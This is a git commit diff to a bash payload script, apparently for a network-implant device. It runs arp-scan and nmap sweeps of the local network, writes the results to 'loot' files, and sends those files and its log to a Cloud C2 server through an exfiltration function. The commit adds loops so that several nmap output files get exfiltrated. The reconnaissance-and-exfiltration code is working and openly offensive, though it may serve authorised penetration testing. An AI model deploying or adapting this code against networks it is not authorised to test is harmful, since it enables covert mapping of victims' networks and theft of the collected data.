Added -oA option for interessting host scan again, exfil for multiple scan results (#50)
* move -oA option to standart nmap scan moving -oA option to generate files to the scan of the whole network, not just the interessting hosts. Since e.g. .xml files are more useful for discovery scans of a whole network. * fix fixed borken funktion * Update payload.sh * adding support for multiple nmaps with -oA option Re-added the -oA option for interessting hosts. With differing file name. Support for multiple nmap scans producing output files via -oA option.pull/51/head
parent
245b54384d
commit
2b04952cb6
|
@ -423,24 +423,23 @@ function GRAB_NMAP_LOOT() {
|
||||||
}
|
}
|
||||||
|
|
||||||
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
||||||
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
||||||
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
||||||
### Adding -oA nmap option to scan option
|
### Adding -oA nmap option to scan option
|
||||||
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}"
|
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-interesting-hosts-${SCAN_COUNT}-${TODAY}"
|
||||||
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
||||||
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
||||||
if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then
|
if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then
|
||||||
INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) )
|
INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) )
|
||||||
fi
|
fi
|
||||||
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
fi
|
fi
|
||||||
return
|
|
||||||
}
|
}
|
||||||
|
|
||||||
function GRAB_DIG_LOOT() {
|
function GRAB_DIG_LOOT() {
|
||||||
|
@ -474,49 +473,52 @@ function GRAB_DIG_LOOT() {
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
|
|
||||||
function EXFIL_TO_CLOUD_C2() {
|
function EXFIL_TO_CLOUD_C2() {
|
||||||
if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then
|
if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then
|
||||||
if [[ $(pgrep cc-client) ]]; then
|
if [[ $(pgrep cc-client) ]]; then
|
||||||
LOOT_FILES="$LOOT_DIR/*.txt"
|
LOOT_FILES="$LOOT_DIR/*.txt"
|
||||||
for LOOT_FILE in $LOOT_FILES; do
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
done
|
done
|
||||||
### Add exfiltration of nmap -oA files
|
|
||||||
## XML
|
|
||||||
LOOT_FILES="$LOOT_DIR/*.xml"
|
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
|
||||||
|
|
||||||
## GNMAP
|
### Add exfiltration of nmap -oA files
|
||||||
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
## XML
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
LOOT_FILES="$LOOT_DIR/*.xml"
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
## NMAP
|
## GNMAP
|
||||||
LOOT_FILES="$LOOT_DIR/*.nmap"
|
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
### Exfiltrate log file
|
## NMAP
|
||||||
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
LOOT_FILES="$LOOT_DIR/*.nmap"
|
||||||
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
else
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
fi
|
### Exfiltrate log file
|
||||||
fi
|
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
||||||
return
|
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
else
|
||||||
|
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
function EXFIL_TO_PASTEBIN() {
|
function EXFIL_TO_PASTEBIN() {
|
||||||
|
|
Loading…
Reference in New Issue